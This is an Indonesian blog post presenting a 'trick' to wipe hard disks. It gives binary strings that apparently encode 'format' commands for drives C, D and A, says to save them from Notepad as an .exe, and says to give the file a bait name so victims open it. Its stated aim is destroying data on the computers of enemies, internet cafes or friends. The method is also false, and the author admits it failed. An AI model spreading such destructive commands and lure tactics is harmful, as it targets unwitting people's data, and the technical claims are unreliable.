Tips dan Trik Format Hardisk dengan Notepad

Tips dan Trik Format Hardisk dengan Notepad
Tips dan Trik Format Hardisk dengan Notepad -?Ini trik jadul banget mungkin udah semua orang yang mengerti IT ( Ilmu Teknologi ) mungkin sudah mengerti semua. Mungkin bisa dibilang ini cuma sekedar catetan saja buat saya. Tetapi apabila kalian belum tahu silahkan anda lanjutkan membaca dan pelajari Tips dan trik Format Hardisk dengan Notepad.
Sebenernya ini trik dan tips Format Hardisk dengan Notepad sering digunakan untuk iseng atau merusak data – data kompi atau laptop musuh, warnet, bahkan temen sendiri kalo mau coba pake komputer sendiri aja jadi kalian ga dosa tuh. 😀
Baik langsung aja ga usah banyak omong.

    1. Format Hardisk.

[code=’css’]01001011000111110010010101010101010000011111100000[/code]

    1. Format Drive C

[code=’css’]01100110011011110111001001101101011000010111010000100000011000110011101001011100?0010000000101111010100010010111101011000[/code]

    1. Format Drive D

[code=’css’]01100110011011110111001001101101011000010111010000100000011001000011101001011100?0010000000101111010100010010111101011000[/code]

    1. Format Drive A

[code=’css’]01100110011011110111001001101101011000010111010000100000011000010011101001011100?0010000000101111010100010010111101011000[/code]
Caranya kalian ketik / copay code binary di atas ke notepad yang sudah kalian siapkan. Setelah itu save /simpan dalam bentuk .exe. Contoh sex.exe, atau apalah yang memancing korban supaya membuka file buatan kalian.
NB: Saya tidak bertanggung jawab atas kejadian yang terjadi.
UPDATE : Sudah saya coba. hasilnya ga ada reaksi alias gagal :))

Published by

amri

Seorang penulis blog yang suka meng-kode juga suka musik dan otomotif. Nah lho bingung kan wkwkwk

0 thoughts on “Tips dan Trik Format Hardisk dengan Notepad”

Leave a Reply